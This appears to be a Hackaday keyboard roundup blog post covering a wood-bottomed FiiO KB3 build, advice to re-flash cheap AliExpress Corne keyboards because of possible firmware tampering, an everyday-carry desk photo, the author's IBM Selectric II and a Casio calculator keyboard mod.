This time, [androidbrick] used a FiiO KB3 and replaced the bottom half of the plastic shell with a hand-routed kitchen cutting board. The battery has been disabled and it works only in wired mode, which is fine with me, because then you get to use a curly cord if you want.

Image by [androidbrick] via redditThe switches are mostly Gateron EF Currys, though [androidbrick] left some of the original Gateron G Pro 3.0 on the stabilized keys just for comparison. As you might imagine, the overall sound is much deeper with a wooden bottom. You can check out the sound test on YouTube if you’d like, though it’s pretty quiet, so turn it up.

Those keycaps look even nicer from top-down, which you’ll see in the sound test video linked above. Just search ‘JCM MOA GMK’ on Ali and you’ll find them in a bunch of colorways for around $20. Apparently, [androidbrick] was saving them for months, just waiting for this build.

Via reddit

Why You Should Always Re-flash New Keyboards

About a month ago, [Artistic-Art-3985] bought the cheapest Corne available on Ali and posted a breakdown of the security and electronics.

Image by [Artistic-Art-3985] via redditThe firmware turned out to be different from the current release in the original repo, which of course is a concern. When asked about it, the seller went silent. So did some other sellers when asked these types of questions.

In a follow-up post, [Artistic] does a great job outlining why you should always re-flash your new keyboards, especially the cheap ones. Although it may seem like a long shot, the threat is real, and he points to a couple examples of shenanigans, like keyloggers.

In a comment to his original post, [Artistic] explains that this particular Ali Corne comes with QMK Vial, which allows you to change the layout on a whim and have it update instantly. This means you don’t have to flash it, but you should, and it’s easy to do and either stick with Vial, or move to straight QMK. He also outlines how it’s done.

The Centerfold: the Hackaday Every Day Carry

Image by [devpew] via redditDid I do it? Did I find the ideal Hackaday centerfold? I’ll totally forgive the lack of desk mat, or just pretend that it’s really big and resembles the surface of the moon.

So what we’ve got here is a Skeletyl keyboard along with some friends, like a Flipper Zero and a Pwnagotchi. Who knows why the knife, but then again knives are useful I suppose. I really dig the cute little trackball, though it seems like it would be fiddly to actually use. This series of posts by [devpew] kicked off a whole everyday carry thing on reddit, which was enjoyable.

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: My Own Personal Holy Grail

So your girl did some wheeling and dealing this weekend and traded four machines plus some cash for her holy grail typewriter, a blue correcting IBM Selectric II. She also got a typewriter table and a dust cover in the deal. It was quite a weekend, really. Got a surprise band saw for late-Christmas, too.

Here’s the best part. When I bought Selectric Blue (it was between that and calling her “Bertha the Bluegirl”), she was in a tan case. A grail for sure, but not the holy grail. I was happy enough to get a working II, mind you. But on a whim, I asked the guy if he ever saw any green ones come across his bench. I don’t know why I didn’t ask about blue; it’s my favorite color after all. But then he tells me he has blue and black cases available right then, though they probably wouldn’t fit the machine I bought. But then we figured out that they did, and I met up with him the following day to turn her blue. Now she’s all I ever wanted. I even got the type ball of my dreams — Adjutant.

(Note: I still love my IBM Wheelwriter 5, which is basically the 80s version of the Selectric. I just love them differently, is all, like having a pair of cats. The Wheelwriter is plastic, for one thing, and the Selectric is almost solid steel. But the Wheelwriter is so snappy and types so crisply, so…)

So, you probably want to know things about the Selectric II. It is the sequel to the Selectric I, which was only called the I after the II came out. The original Selectric wowed the world with its spinning golf ball type element, which replaced the swinging type bars of most typewriters and hearkened back to. My machine is in a way the Selectric II.5, as the first IIs introduced in 1971 didn’t have correction built in — that came along in 1973.

So much has been written about Selectrics. But did you know they were part of Cold War-era espionage?

ICYMI: Casio Calculator Gets New Keyboard

Image by [Poking Technology] via YouTubeDo you recall the 1985 Casio FX-451 calculator? It was a pocket-sized foldout scientific wonder, with both hard keys and a set of membrane keys built into the case.

[Poking Technology] had one with a broken membrane keyboard and decided to upgrade it to a mechanical keyboard. Of course, it’s no longer pocket-sized, but who’s counting?

If you like build detail, you’re in for a treat, because there are two videos covering the entire process. It was a challenge to disassemble the thing, and soldering wires to the keyboard was no picnic, either — some lines are on the back of PCB and go under the main IC on their way to the top. Excellent work, [Poking]!

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/02/17/keebin…